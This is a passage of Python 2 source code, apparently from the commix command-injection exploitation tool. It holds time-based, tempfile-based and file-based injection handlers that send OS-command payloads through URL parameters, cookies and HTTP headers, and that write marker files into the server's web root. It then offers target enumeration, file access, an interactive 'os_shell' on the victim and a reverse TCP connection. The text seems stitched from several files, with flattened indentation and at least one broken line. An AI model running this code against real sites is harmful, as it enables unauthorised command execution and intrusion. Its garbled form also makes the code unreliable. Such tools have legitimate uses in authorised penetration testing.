Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay): # Time relative false positive fixation. if len(TAG) == output_length: randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 cmd = "(" + str(randv1) + "+" + str(randv2) + ")" # Check for false positive resutls output = tb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell) if str(output) == str(randvcalc) and len(TAG) == output_length: if not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break else: percent = str(float_percent)+"%" if not menu.options.verbose: sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except: break # Yaw, got shellz! # Do some magic tricks! if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay): if len(TAG) == output_length : found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower() if enumerate_again in settings.CHOISE_YES: tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : while True: file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower() if file_access_again in settings.CHOISE_YES: print "" tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Check if defined single cmd. if menu.options.os_cmd: cmd = menu.options.os_cmd check_how_long, output = tb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Exploirt injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) sys.exit(0) # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd == "?": menu.shell_options() continue elif cmd.lower() == "quit": sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass else: # The main command injection exploitation. check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Exploirt injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) print "" except KeyboardInterrupt: raise elif gotshell in settings.CHOISE_NO: if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass break if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response): counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False possibly_vulnerable = False false_positive_warning = False how_long_statistic = [] export_injection_info = False how_long = 0 injection_type = "semi-blind command injection" technique = "tempfile-based injection technique" # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: err_msg = "The '--url-reload' option is not available in " + technique + "!" print settings.print_critical_msg(err_msg) whitespace = checks.check_whitespaces() if settings.VERBOSITY_LEVEL >= 1: info_msg ="Testing the " + technique + "... " print settings.print_info_msg(info_msg) # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: if settings.LOAD_SESSION: cmd = shell = "" url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) checks.check_for_stored_tamper(payload) settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - delay OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" else: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive resutls. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) # The output file for file-based injection technique. OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" alter_shell = menu.options.alter_shell tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: # Tempfile-based decision payload (check if host is vulnerable). if alter_shell : payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) else: payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) # Encode payload to Base64 if settings.TAMPER_SCRIPTS['base64encode']: from src.core.tamper import base64encode payload = base64encode.encode(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: payload_msg = payload.replace("\n", "\\n") print settings.print_payload(payload_msg) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) how_long = tfb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url) # Statistical analysis in time responses. how_long_statistic.append(how_long) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2)) if percent == 100 and no_result == True: if not settings.VERBOSITY_LEVEL >= 1: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : # Time relative false positive fixation. false_positive_fixation = False if len(TAG) == output_length: # Simple statical analysis statistical_anomaly = True if len(set(how_long_statistic[0:5])) == 1: if max(xrange(len(how_long_statistic)), key=lambda x: how_long_statistic[x]) == len(TAG) - 1: statistical_anomaly = False how_long_statistic = [] if delay <= how_long and not statistical_anomaly: false_positive_fixation = True else: false_positive_warning = True # Identified false positive warning message. if false_positive_warning: warn_msg = "Unexpected time delays have been identified due to unstable " warn_msg += "requests. This behavior may lead to false-positive results.\n" sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) while True: question_msg = "How do you want to proceed? [(C)ontinue/(s)kip/(q)uit] > " sys.stdout.write(settings.print_question_msg(question_msg)) proceed_option = sys.stdin.readline().replace("\n","").lower() if proceed_option.lower() in settings.CHOICE_PROCEED : if proceed_option.lower() == "s": false_positive_fixation = False raise elif proceed_option.lower() == "c": delay = delay + 1 false_positive_fixation = True break elif proceed_option.lower() == "q": raise SystemExit() else: if proceed_option == "": proceed_option = "enter" err_msg = "'" + proceed_option + "' is not a valid answer." print settings.print_error_msg(err_msg) pass # Check if false positive fixation is True. if false_positive_fixation: false_positive_fixation = False settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - delay if false_positive_warning: time.sleep(1) randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 if settings.TARGET_OS == "win": if alter_shell: cmd = settings.WIN_PYTHON_DIR + "python.exe -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" else: cmd = "powershell.exe -InputFormat none write (" + str(randv1) + " + " + str(randv2) + ")" else: cmd = "echo $((" + str(randv1) + " + " + str(randv2) + "))" # Check for false positive resutls how_long, output = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, how_long, url_time_response) if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : if str(output) == str(randvcalc) and len(TAG) == output_length: possibly_vulnerable = True how_long_statistic = 0 if not settings.VERBOSITY_LEVEL >= 1: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" #break else: break # False positive else: if not settings.VERBOSITY_LEVEL >= 1: percent = str(float_percent)+ "%" info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue else: if not settings.VERBOSITY_LEVEL >= 1: percent = str(float_percent)+ "%" info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: if 'cmd' in locals(): # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except: percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: if not settings.VERBOSITY_LEVEL >= 1: percent = Fore.RED + "FAILED" + Style.RESET_ALL info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() else: percent = "" else: percent = str(float_percent) + "%" #Print logs notification message #percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() print "" logs.logs_notification(filename) raise else: percent = str(float_percent) + "%" break # Yaw, got shellz! # Do some magic tricks! if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : if (len(TAG) == output_length) and \ (possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level): found = True no_result = False if settings.LOAD_SESSION: possibly_vulnerable = False if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: print "" # Print the findings to terminal. success_msg = "The" if found_vuln_parameter == " ": success_msg += http_request_method + "" success_msg += the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "." print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: shell = "" session_handler.injection_point_importation(url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable=menu.options.level) #possibly_vulnerable = False else: settings.LOAD_SESSION = False # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if settings.TARGET_OS == "win": time.sleep(1) new_line = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: question_msg = "Do you want to enumerate again? [Y/n/q] > " enumerate_again = raw_input("\n" + settings.print_question_msg(question_msg)).lower() if enumerate_again in settings.CHOICE_YES: tfb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) print "" break elif enumerate_again in settings.CHOICE_NO: new_line = True break elif enumerate_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.enumeration_options(): tfb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : print "" while True: question_msg = "Do you want to access files again? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline().replace("\n","").lower() if file_access_again in settings.CHOICE_YES: tfb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) break elif file_access_again in settings.CHOICE_NO: if not new_line: new_line = True break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if file_access_again == "": file_access_again = "enter" err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: # if not menu.enumeration_options() and not menu.options.os_cmd: # print "" tfb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Check if defined single cmd. if menu.options.os_cmd: check_how_long, output = tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Export injection result tfb_injector.export_injection_results(cmd, separator, output, check_how_long) # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) if not new_line : print "" try: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break question_msg = "Do you want a Pseudo-Terminal? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace("\n","").lower() if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: if false_positive_warning: warn_msg = "Due to unexpected time delays, it is highly " warn_msg += "recommended to enable the 'reverse_tcp' option.\n" sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) false_positive_warning = False try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": warn_msg = "You are already into an 'os_shell' mode." print settings.print_warning_msg(warn_msg)+ "\n" elif os_shell_option == "reverse_tcp": settings.REVERSE_TCP = True # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp() if settings.REVERSE_TCP == False: continue while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options() result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. from src.core.injections.results_based.techniques.classic import cb_injector separator = checks.time_based_separators(separator, http_request_method) whitespace = settings.WHITESPACE[0] response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Evaluate injection results. shell = cb_injector.injection_results(response, TAG, cmd) if settings.VERBOSITY_LEVEL >= 1: print "" err_msg = "The reverse TCP connection has been failed!" print settings.print_critical_msg(err_msg) else: pass else: print "" if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # The main command injection exploitation. check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Export injection result tfb_injector.export_injection_results(cmd, separator, output, check_how_long) if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, output, vuln_parameter) else: output = session_handler.export_stored_cmd(url, cmd, vuln_parameter) print Fore.GREEN + Style.BRIGHT + output + "\n" + Style.RESET_ALL except KeyboardInterrupt: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) return True elif gotshell in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if gotshell == "": gotshell = "enter" err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) pass except KeyboardInterrupt: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def fb_injection_handler(url, delay, filename, http_request_method, url_time_response): counter = 1 vp_flag = True exit_loops = False no_result = True is_encoded = False stop_injection = False call_tmp_based = False next_attack_vector = False export_injection_info = False injection_type = "semi-blind command injection" technique = "file-based injection technique" # Set temp path if settings.TARGET_OS == "win": if "microsoft-iis" in settings.SERVER_BANNER.lower(): settings.TMP_PATH = "C:\\Windows\TEMP\\" else: settings.TMP_PATH = "%temp%\\" else: settings.TMP_PATH = "/tmp/" if menu.options.tmp_path: tmp_path = menu.options.tmp_path else: tmp_path = settings.TMP_PATH if settings.DEFAULT_SRV_ROOT_DIR != settings.SRV_ROOT_DIR: settings.SRV_ROOT_DIR = settings.DEFAULT_SRV_ROOT_DIR if menu.options.file_dest and '/tmp/' in menu.options.file_dest: call_tmp_based = True else: if menu.options.srv_root_dir: settings.SRV_ROOT_DIR = menu.options.srv_root_dir else: # Debian/Ubunt have been updated to use /var/www/html as default instead of /var/www. if "apache" in settings.SERVER_BANNER.lower(): if "debian" or "ubuntu" in settings.SERVER_BANNER.lower(): try: check_version = re.findall(r"/(.*)\.", settings.SERVER_BANNER.lower()) if check_version[0] > "2.3" and not settings.TARGET_OS == "win": # Add "/html" to servers root directory settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html" else: settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR except IndexError: pass # Add "/html" to servers root directory elif "fedora" or "centos" in settings.SERVER_BANNER.lower(): settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html" else: pass # On more recent versions (>= "1.2.4") the default root path has changed to "/usr/share/nginx/html" elif "nginx" in settings.SERVER_BANNER.lower(): try: check_version = re.findall(r"/(.*)\.", settings.SERVER_BANNER.lower()) if check_version[0] >= "1.2.4": # Add "/html" to servers root directory settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html" else: # Add "/www" to servers root directory settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/www" except IndexError: pass elif "microsoft-iis" in settings.SERVER_BANNER.lower(): pass else: # Provide custom server's root directory. custom_srv_root_dir() path = urlparse.urlparse(url).path path_parts = path.split('/') count = 0 for part in path_parts: count = count + 1 count = count - 1 last_param = path_parts[count] EXTRA_DIR = path.replace(last_param, "") settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + EXTRA_DIR if settings.TARGET_OS == "win": settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR.replace("/","\\") if not settings.LOAD_SESSION or settings.RETEST == True: info_msg = "Trying to create a file in '" + settings.SRV_ROOT_DIR + "'... " print settings.print_info_msg(info_msg) i = 0 TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) # Calculate all possible combinations total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) # Check if defined alter shell alter_shell = menu.options.alter_shell for whitespace in settings.WHITESPACE: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # If a previous session is available. if settings.LOAD_SESSION and session_handler.notification(url, technique): url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) checks.check_for_stored_tamper(payload) OUTPUT_TEXTFILE = TAG + ".txt" if technique == "tempfile-based injection technique": #settings.LOAD_SESSION = True tfb_handler.exploitation(url, delay, filename, tmp_path, http_request_method, url_time_response) if settings.RETEST == True: settings.RETEST = False from src.core.injections.results_based.techniques.classic import cb_handler cb_handler.exploitation(url, delay, filename, http_request_method) if not settings.LOAD_SESSION: i = i + 1 # The output file for file-based injection technique. OUTPUT_TEXTFILE = TAG + ".txt" # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" try: # File-based decision payload (check if host is vulnerable). if alter_shell : payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE) else: payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE) # Check if defined "--prefix" option. # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) if settings.TAMPER_SCRIPTS['base64encode']: from src.core.tamper import base64encode payload = base64encode.encode(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: payload_msg = payload.replace("\n", "\\n") print settings.print_payload(payload_msg) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) response = fb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) response = fb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) response = fb_injector.referer_injection_test(url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) response = fb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url) # Find the directory. output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, delay) time.sleep(delay) try: # Check if defined extra headers. request = urllib2.Request(output) headers.do_check(request) # Evaluate test results. output = urllib2.urlopen(request) html_data = shell = re.findall(r"" + TAG + "", html_data) if len(shell) != 0 and shell[0] == TAG and not settings.VERBOSITY_LEVEL >= 1: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL info_msg = "Testing the " + technique + "... [ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if len(shell) == 0 : # delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # if settings.VERBOSITY_LEVEL >= 1: # print "" raise urllib2.HTTPError(url, 404, 'Error', {}, None) except urllib2.HTTPError, e: if e.getcode() == 404: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if call_tmp_based == True: exit_loops = True tmp_path = os.path.split(menu.options.file_dest)[0] + "/" tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response) raise # Show an error message, 